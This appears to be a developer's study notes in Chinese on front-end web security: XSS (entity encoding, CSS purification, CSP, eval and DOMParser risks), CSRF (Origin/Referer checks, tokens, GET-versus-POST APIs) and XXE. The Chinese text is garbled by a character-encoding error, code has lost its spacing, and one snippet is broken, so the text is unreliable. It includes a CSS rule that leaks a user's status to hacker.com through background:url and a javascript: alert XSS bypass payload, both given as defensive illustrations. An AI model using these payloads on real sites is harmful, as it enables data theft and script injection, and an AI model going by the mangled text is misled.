Cross-sitescripting(XSS)涓轰簡鍑忓皯XSS婕忔礊鐨勫彲鑳芥€э紝涓€涓噸瑕佺殑寮€鍙戝師鍒欐槸鎴戜滑搴旇绂佹浠讳綍鐢ㄦ埛鍒涘缓鐨勬湭澶勭悊鐨勬暟鎹浼犻€掑埌DOM涓€傚綋鐢ㄦ埛鍒涘缓鐨勬暟鎹繀椤讳紶閫掔粰DOM鏃讹紝搴斿敖鍙兘浠ュ瓧绗︿覆褰㈠紡浼犻€掋€傜被浼煎瓧绗︿覆鐨勬鏌ユ垜浠彲浠ラ€氳繃澶氱鏂瑰紡妫€鏌ュ鎴风鍜屾湇鍔″櫒涓婄殑鏁版嵁銆備竴绉嶆柟娉曟槸鍒╃敤JavaScript涓殑鍐呯疆鍑芥暟JSON.parse()锛屽畠灏嗘枃鏈浆鎹负JSON瀵硅薄锛屼粠鑰屽皢鏁板瓧鍜屽瓧绗︿覆涓庤浆鎹㈠悗鐨勫唴瀹硅繘琛屾瘮杈冦€傚鏋滀竴鑷达紝鍒欐鏌ュ彲浠ラ€氳繃锛屼絾鏄嚱鏁扮瓑澶嶆潅鏁版嵁绫诲瀷鐨勬瘮杈冧細澶辫触锛屽洜涓哄畠浠笉绗﹀悎JSON鍏煎鐨勬牸寮忋€倂arisStringLike=function(val){try{returnJSON.stringify(JSON.parse(val))===val;}catch(e){console.log('涓嶅儚瀛楃涓?);}};string娓呯悊鍚庣殑瀛楃涓?绫诲瓧绗︿覆鏈韩涓嶆槸DOM锛屼絾浠嶇劧鍙互瑙i噴鎴栬浆鎹负DOM銆備负閬垮厤杩欑鎯呭喌锛屾垜浠繀椤荤‘淇滵OM灏嗗叾閫愬瓧缈昏瘧涓哄瓧绗︿覆鎴栫被瀛楃涓诧紝鑰屼笉杩涜杞崲銆侶TML瀹炰綋缂栫爜瀵圭敤鎴锋彁渚涚殑鏁版嵁涓瓨鍦ㄧ殑鎵€鏈塇TML鏍囪鎵цHTML瀹炰綋杞箟銆傚疄浣撶紪鐮佸厑璁告煇浜涘瓧绗﹀湪娴忚鍣ㄤ腑鏄剧ず锛屼絾涓嶈兘琚В閲婁负JavaScript鎵ц銆傛瘮濡傛爣绛?>瀵瑰簲鐨勪唬鐮佹槸&+lt;鍜?+gt;銆侰SSPurificationCSS鍑€鍖栧寘鎷噣鍖栦换浣曚笌HTTP鐩稿叧鐨凜SS灞炴€э紝鎴栬€呭彧鍏佽鐢ㄦ埛鏇存敼鎸囧畾鐨凜SS瀛楁锛屾垨鑰呯畝鍗曞湴绂佹鐢ㄦ埛涓婁紶CSS绛夈€傚洜涓虹浉鍏冲睘鎬э紝姣斿background:url锛屽彲鑳戒細瀵艰嚧榛戝杩滅▼鏇存敼椤甸潰鐨勬樉绀恒€?bankMember[status="vip"]{background:url("https://www.hacker.com/incomes?status=vip");}鍐呭瀹夊叏绛栫暐鍐呭瀹夊叏绛栫暐锛圕SP锛夋槸涓€涓畨鍏ㄩ厤缃伐鍏枫€侰SP鍙互璁╂垜浠皢鍏佽鍔ㄦ€佸姞杞借剼鏈殑缃戠珯鍒楀叆鐧藉悕鍗曘€侰SP鐨勫疄鐜版柟寮忓緢绠€鍗曘€傚鏋滄槸鍦ㄥ悗绔紝鍙互閫氳繃娣诲姞Content-Security-Policy澶存潵瀹炵幇锛涘鏋滄槸鍦ㄥ墠绔紝鍙互閫氳繃meta鏍囩鏉ュ疄鐜般€侰ontent-Security-Policy:script-src"self"https://api.example.com.鍙﹀锛岄粯璁ゆ儏鍐典笅锛孋SP鍙互绂佹浠讳綍褰㈠紡鐨勫唴鑱旇剼鏈墽琛屻€備娇鐢–SP鏃讹紝璇锋敞鎰忎笉瑕佷娇鐢╡val()鎴杄val()涔嬬被鐨勫瓧绗︿覆銆俥val()鐨勫弬鏁版槸涓€涓瓧绗︿覆锛屼絾濡傛灉璇ュ瓧绗︿覆琛ㄧず鍑芥暟琛ㄨ揪寮忥紝鍒檈val()浼氳绠楄琛ㄨ揪寮忋€傚鏋滃弬鏁拌〃绀轰竴涓垨澶氫釜JavaScript璇彞锛屽垯eval()涔熷皢鎵ц杩欎簺璇彞銆俥val("17+9")//26varcountdownTimer=function(mins,msg){setTimeout(`console.log(${msg});`,mins*60*1000);};灏介噺閬垮紑APIDOMParserAPI锛屽畠鍙互灏唒arseFromString鏂规硶涓殑瀛楃涓插唴瀹瑰姞杞藉埌DOM鑺傜偣涓€傝繖瀵逛簬浠庢湇鍔″櫒鍔犺浇缁撴瀯鍖朌OM鍙兘寰堟柟渚匡紝浣嗗瓨鍦ㄥ畨鍏ㄩ闄┿€傚閫夋柟妗堬細document.createElement()鍜宒ocument.appendChild()鍙互闄嶄綆椋庨櫓varparser=newDOMParser();varhtml=parser.parseFromString('`);Blob鍜孲VGAPI涔熸槸闇€瑕佹敞鎰忕殑鎺ュ彛锛屽洜涓哄畠浠瓨鍌ㄤ换鎰忔暟鎹苟鑳藉鎵ц浠g爜锛屾墍浠ュ畠浠緢瀹规槗鎴愪负姹$偣鎺ユ敹鍣ㄣ€傚嵆浣垮皢鏈爣璁扮殑瀛楃涓叉敞鍏OM锛屼篃寰堥毦纭繚鑴氭湰涓嶄細娼滃叆銆備緥濡備笅闈㈢殑渚嬪瓙鍙互缁曡繃鏍囩鎴栬€呭崟鍙屽紩鍙风殑妫€鏌ワ紝閫氳繃鍐掑彿鍜屽瓧绗︿覆鐨勬柟寮忔墽琛屽脊绐楄剼鏈紝鏄剧ず鈥淴SS鈥濄€?ahref="javascript:alert(String.fromCharCode(88,83,83))">鐐规垜璺ㄧ珯璇锋眰浼€犱互涓婃槸閽堝璺ㄧ珯鑴氭湰鏀诲嚮鐨勪竴浜涢槻寰℃柟妗堛€傛帴涓嬫潵锛岃鎴戜滑鐪嬬湅璺ㄧ珯璇锋眰浼€犮€傜珯鐐硅姹備吉閫?CSRF)锛岃繖鏄彟涓€涓渶瑕佹敞鎰忕殑瀹夊叏椋庨櫓銆傝姹傛潵婧愭鏌ョ敱浜嶤SRF璇锋眰鏉ヨ嚜搴旂敤绋嬪簭澶栭儴锛屾垜浠彲浠ラ€氳繃妫€鏌ヨ姹傛潵婧愭潵闄嶄綆鐩稿叧椋庨櫓銆傚湪HTTP涓紝鏈変袱涓猦eader鍙互甯姪鎴戜滑妫€鏌ヨ姹傜殑鏉ユ簮锛屽垎鍒槸Referer鍜孫rigin銆侽rigin鏍囧ご浠呭湪HTTPPOST璇锋眰涓彂閫侊紝瀹冩寚绀鸿姹傜殑鏉ユ簮銆備笌Referer涓嶅悓锛岃繖涓猦eader涔熷瓨鍦ㄤ簬HTTPS璇锋眰涓€侽rigin:https://www.example.com:80Referer澶翠篃鎸囨槑浜嗚姹傜殑鏉ユ簮銆傞櫎闈炶缃负rel=noreferer锛屽惁鍒欐樉绀哄涓嬶細Referer:https://www.example.com:80濡傛灉鍙互锛屾偍搴旇鍚屾椂妫€鏌ヤ袱鑰呫€傚鏋滀袱鑰呴兘娌℃湁锛屽垯鍩烘湰涓婂彲浠ヨ涓鸿璇锋眰涓嶆槸鏍囧噯璇锋眰锛屽簲璇ユ嫆缁濄€傝繖涓や釜澶寸悆鏄畨鍏ㄧ殑绗竴閬撻槻绾匡紝浣嗘湁涓€绉嶆儏鍐垫槸鍙互鐮撮槻鐨勩€傚鏋滄敾鍑昏€呬粠婧愬ご涓婅鍒楀叆鐧藉悕鍗曪紝鐗瑰埆鏄鏋滄偍鐨勭珯鐐瑰厑璁哥敤鎴风敓鎴愬唴瀹癸紝鍒欏彲鑳介渶瑕侀澶栫殑瀹夊叏绛栫暐鏉ラ槻姝㈢被浼肩殑鏀诲嚮銆備娇鐢–SRFtoken浣跨敤CSRFtoken涔熸槸闃叉璺ㄧ珯璇锋眰浼€犵殑鏂规硶涔嬩竴銆傚畠鐨勫疄鐜颁篃寰堢畝鍗曪紝鏈嶅姟绔彂閫佷竴涓猼oken缁欏鎴风銆傛棤鐘舵€丟ET璇锋眰鐢变簬閫氬父鏈€瀹规槗鍙戝嚭鐨凜SRF鏀诲嚮鏄€氳繃HTTPGET璇锋眰锛屽洜姝ゆ纭瀯寤篈PI鍙互闄嶄綆杩欑椋庨櫓銆侶TTPGET璇锋眰涓嶅簲瀛樺偍鎴栦慨鏀逛换浣曟湇鍔″櫒绔姸鎬侊紝杩欐牱鍋氫細鍏佽鏈潵鐨凥TTPGET璇锋眰鎴栦慨鏀瑰鑷碈SRF鏀诲嚮銆?/GETvaruser=function(request,response){getUserById(request.query.id).then((user)=>{if(request.query.updates){user.update(request.updates);}杩斿洖鍝嶅簲.json(user);});};鍙傝€冧唬鐮佺ず渚嬶紝绗竴涓狝PI灏嗕袱涓簨鍔″悎骞朵负涓€涓猺equest+涓€涓彲閫夌殑update锛岀浜屼釜API灏唂etch鍜寀pdate鍒嗕负GET鍜孭OSTask銆傜涓€涓狝PI鏋佹湁鍙兘琚獵SRF鏀诲嚮鑰呭埄鐢紱绗簩涓狝PI锛岃櫧鐒朵篃鍙兘琚敾鍑伙紝浣嗚嚦灏戝彲浠ラ樆姝㈤摼鎺ャ€佸浘鍍忔垨鍏朵粬HTTPGET椋庢牸鐨勬敾鍑汇€?/GETvargetUser=function(request,response){getUserById(request.query.id).then((user)=>{returnresponse.json(user);});};//POSTvarupdateUser=function(request,response){getUserById(request.query.id).then((user)=>{user.update(request.updates).then((updated)=>{if(!updated){returnresponse.sendStatus(400);}杩斿洖鍝嶅簲.sendStatus(200);});});};娉涚郴缁烠SRF闃插尽鏍规嵁鏈ㄦ《鍘熺悊锛屼竴涓郴缁熷線寰€鏄奖鍝嶇郴缁熷畨鍏ㄧ殑鏈€钖勫急鐜妭銆傞偅涔堟垜浠渶瑕佸叧娉ㄧ殑鏄浣曟瀯寤轰竴涓硾绯荤粺鐨凜SRF闃插尽銆傚ぇ澶氭暟鐜颁唬鏈嶅姟鍣ㄩ兘鍏佽鍦ㄦ墽琛屼换浣曢€昏緫涔嬪墠鍒涘缓涓€涓湪鎵€鏈夎皟鐢ㄤ腑璺敱鍒扮殑涓棿浠躲€俋XE婕忔礊XXE浠h〃XML澶栭儴瀹炰綋娉ㄥ叆锛圶MLExternalEntity锛夈€傞槻姝㈣繖绉嶆敾鍑荤殑鏂规硶姣旇緝绠€鍗曪紝鎴戜滑鍙互閫氳繃鍦╔ML瑙f瀽鍣ㄤ腑绂佹澶栭儴瀹炰綋鏉ラ槻姝㈣繖绉嶆敾鍑汇€俿etFeature("http://apache.org/xml/features/disallow-doctype-decl",true);瀵逛簬鍩轰簬Java璇█鐨刋ML瑙f瀽鍣紝OWASP灏哫XE鏍囪涓虹壒鍒嵄闄╋紱瀵逛簬鍏朵粬璇█锛岄粯璁ゆ儏鍐典笅鍙兘浼氱鐢╔ML澶栭儴瀹炰綋銆備絾鏄负浜嗗畨鍏ㄨ捣瑙侊紝涓嶇浣犱娇鐢ㄤ粈涔堣瑷€锛屾渶濂芥牴鎹璇█鎻愪緵鐨凙PI鏂囨。锛屾壘鍒扮浉鍏崇殑榛樿閫夐」锛岀湅鐪嬫槸鍚﹂渶瑕佸仛鐩稿叧鐨勫畨鍏ㄥ鐞嗐€傚鏋滃彲鑳斤紝浣跨敤JSON鑰屼笉鏄疿ML涔熸槸涓€涓笉閿欑殑閫夋嫨銆侸SON姣擷ML鐩稿鏇磋交銆佹洿鐏垫椿锛屽姞杞介€熷害鏇村揩銆佹洿瀹规槗銆傛湰鏂囦负2鏈圖ay11鐨勫涔犵瑪璁帮紝鍐呭鏉ヨ嚜鏋佸鏃堕棿銆奐vascript杩涢樁瀹炴垬璇俱€嬶紝涓€璧疯繘姝ヰ煉煉?/p>
